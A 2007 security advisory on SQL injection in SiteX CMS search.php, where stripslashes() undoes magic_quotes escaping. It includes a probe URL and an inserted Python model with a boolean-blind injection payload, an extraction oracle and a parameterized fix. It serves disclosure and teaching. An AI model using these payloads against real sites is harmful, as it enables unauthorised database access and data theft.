
[waraxe-2007-SA#055] - Sql Injection in SiteX CMS 0.7.3 Beta

From: <come2waraxe(at)yahoo.com>
Date: Thu Sep 27 2007 - 09:24:20 EDT


Author: Janek Vind "waraxe"
Date: 27. September 2007
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-55.html

Target software description:


http://sitex.bjsintay.com/

SiteX is a versatile web tool that will enable you to start your own dynamic website in under 5 minutes. Driven by PHP and MySQL, SiteX consists of components common to most personal and professional websites.

Vulnerabilities: Sql Injection in "search.php"


Let's analyze the "search.php" source code:

------------>[source code]<------------

if(isset($_GET['search']))
        $search = stripslashes($search);   // strips the backslashes magic_quotes_gpc added

$search = trim(stripslashes($search));     // stripped again, then whitespace trimmed
...
$sxPhotoResults = sxPhotoSearchResults($search);   // raw string goes into the query

------------>[/source code]<-----------

As we can see, stripslashes() is applied to the search string, so "magic_quotes" will not help against SQL injection: any backslashes it added are removed again before the query is built. The function "sxPhotoSearchResults()" that receives the string does not sanitize it either, so a single quote in the search term lands inside the LIKE patterns unescaped.

So let's run a test:

http://victim.com/search.php?search=O'Brien

and we get a nice error message:

SiteX experienced error #1 with an SQL bash readout of : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Brien%' OR SiteX_Photos.name LIKE '%O'Brien%' OR SiteX_Photos.description LIKE '' at line 2

Yep, SQL injection exists here. Now, some facts about this injection:

  1. This seems to be exploitable only as blind SQL injection. I have written a proof-of-concept exploit for this and it works as expected.
  2. "magic_quotes" does not matter, because "stripslashes()" is used and undoes its escaping.
  3. "register_globals" is not important either, because the attack comes in via "$_GET".
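The following is an added example, not code from the advisory or from SiteX, that models the three points above so they can be checked offline. SQLite stands in for MySQL (the error text differs, the failure mode is the same), the sample rows are constructed, and the query shape is reconstructed from the error message above: only the "name" and "description" columns of SiteX_Photos are visible there, so the real sxPhotoSearchResults() query, the boolean payload shape and the PHP helper names are assumptions of this example. It shows magic_quotes escaping being undone by stripslashes(), the O'Brien syntax error, a boolean-blind oracle built on the same flaw, and a parameterized version of the search for comparison.

```python
"""Model of the SiteX search.php flaw described in the advisory above.

Added example, not SiteX code. SQLite stands in for MySQL, and the query
shape is reconstructed from the error message in the advisory (only the
`name` and `description` columns of SiteX_Photos are visible there; the
real sxPhotoSearchResults() query is not on the page).
"""
import sqlite3

# Constructed sample data, not from any real SiteX installation.
SAMPLE_ROWS = [
    ("Sunset over Tartu", "Evening photo of the river"),
    ("O'Brien portrait", "Studio shot"),
    ("Beach", "Summer holiday"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE SiteX_Photos (name TEXT, description TEXT)")
    conn.executemany("INSERT INTO SiteX_Photos VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def php_addslashes(s):
    """What magic_quotes_gpc did to every GET value: backslash-escape ' \" \\ and NUL."""
    out = []
    for ch in s:
        if ch in "'\"\\":
            out.append("\\" + ch)
        elif ch == "\0":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def php_stripslashes(s):
    """PHP stripslashes(): drop one level of backslashes, so escaped quotes become raw quotes again."""
    out = []
    i = 0
    while i < len(s):
        if s[i] == "\\":
            if i + 1 < len(s):
                out.append("\0" if s[i + 1] == "0" else s[i + 1])
            i += 2  # a trailing lone backslash is simply dropped
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def build_vulnerable_query(search):
    # The search term is pasted straight into the LIKE patterns, as sxPhotoSearchResults() does.
    return ("SELECT name FROM SiteX_Photos WHERE "
            f"SiteX_Photos.name LIKE '%{search}%' OR SiteX_Photos.description LIKE '%{search}%'")


def vulnerable_search(conn, get_value, magic_quotes=True):
    """search.php as described: magic_quotes escapes the input, stripslashes() undoes it, trim() trims."""
    value = php_addslashes(get_value) if magic_quotes else get_value
    search = php_stripslashes(value).strip()
    return [row[0] for row in conn.execute(build_vulnerable_query(search))]


def triggers_sql_error(conn, get_value):
    """True when the input breaks the query, like the O'Brien test in the advisory."""
    try:
        vulnerable_search(conn, get_value)
    except sqlite3.OperationalError:
        return True
    return False


def blind_oracle(conn, condition):
    """Boolean-blind probe (assumed payload shape): rows come back only if `condition` is true."""
    # Close the open '%...' string, inject the condition, then re-open a string
    # so the trailing %' of the original pattern is absorbed and the SQL stays valid.
    payload = f"zz' OR ({condition}) OR 'x"
    return len(vulnerable_search(conn, payload)) > 0


def safe_search(conn, get_value):
    """Hardened version: bind the term as a parameter, so quotes in the input are data, not syntax."""
    search = get_value.strip()
    cur = conn.execute(
        "SELECT name FROM SiteX_Photos WHERE name LIKE '%' || ? || '%' "
        "OR description LIKE '%' || ? || '%'",
        (search, search),
    )
    return [row[0] for row in cur]


if __name__ == "__main__":
    db = make_db()
    print(php_stripslashes(php_addslashes("O'Brien")))       # O'Brien
    print(triggers_sql_error(db, "O'Brien"))                  # True
    print(blind_oracle(db, "1=1"), blind_oracle(db, "1=2"))   # True False
    print(safe_search(db, "O'Brien"))                         # ["O'Brien portrait"]
```

The oracle is what makes the bug exploitable even though the page never echoes query results: a true condition returns the normal result set, a false one returns nothing, and conditions such as `(SELECT COUNT(*) FROM SiteX_Photos) = 3` can be tested one bit at a time. In the parameterized version the `%` and `_` wildcards in user input are still interpreted by LIKE; that is a search-semantics issue, not an injection, and can be handled with an ESCAPE clause if it matters.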

Greetings:


Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb and all other people who know me!
Greetings to Raido Kerna.
Greetings to the Torufoorum folks!

Contact:


come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/

Shameless advertising:


Astronomy books - http://astronomy.oldreadings.com/
User Manuals - http://user-manuals.waraxe.us/

[ EOF ] ------------------------------------
Received on Thu Sep 27 11:55:34 2007
